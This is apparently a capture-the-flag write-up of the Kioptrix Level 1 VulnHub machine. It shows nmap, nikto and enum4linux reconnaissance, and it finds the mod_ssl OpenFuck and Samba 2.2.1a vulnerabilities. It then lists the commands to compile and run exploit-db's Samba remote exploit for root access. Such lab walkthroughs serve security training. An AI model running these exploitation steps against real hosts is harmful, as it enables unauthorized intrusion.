This is my writeup for the Kioptrix Level 1 VM from vulnhub.com. It's considered as easy. The object of the game is to acquire root access via any means possible. There are more ways then one to successfully complete the challenges.
Let's do a nmap_fast scan.
We now have a list of ports. When we access the IP of the VM on port 80, we see a test page for the Apache Web Server.
Let's see what nikto finds on this webserver.
One interesting part is a vulnerability in mod_ssl which may allow a remote shell:
mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
Asking google for "OSVDB-756" returns a lot of results regarding OpenFuck which targets mod_ssl. Even a step-by-step guide to update the old exploit to work with the newer library files for OpenSSL. We need to change the link to the exploit as well.
From the nmap scan we can see, samba runs on port 139.
Let's have a closer look:
When running enum4linux we get to know that Samba 2.2.1a is installed.
[+] Got OS info for 192.168.254.162 from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a] [+] Got OS info for 192.168.254.162 from srvinfo: KIOPTRIX Wk Sv PrQ Unx NT SNT Samba Server platform_id : 500 os version : 4.5 server type : 0x9a03
We use searchsploit to find exploits for this version.
$ searchsploit samba 2.2
After updating the exploit, we run it against our victim.
The flag is located in one of the mails for root:
$ mail Message 1: From root Sat Sep 26 11:42:10 2009 Date: Sat, 26 Sep 2009 11:42:10 -0400 From: root <firstname.lastname@example.org> To: email@example.com Subject: About Level 2 If you are reading this, you got root. Congratulations. Level 2 won't be as easy...
Let's use the RCE exploit. First we copy the exploit to our working directory:
$ cp /usr/share/exploitdb/platforms/linux/remote/10.c exploit.c
Next we need to compile it and make it executable:
$ gcc -o samba_exploit exploit.c $ chmod +x samba_exploit
Then we run the exploit against our victim (-b is platform selection):
$ ./samba_exploit -b 0 __IP__
Kioptrix: Level 1 is good to step into scanning and running prewritten exploits.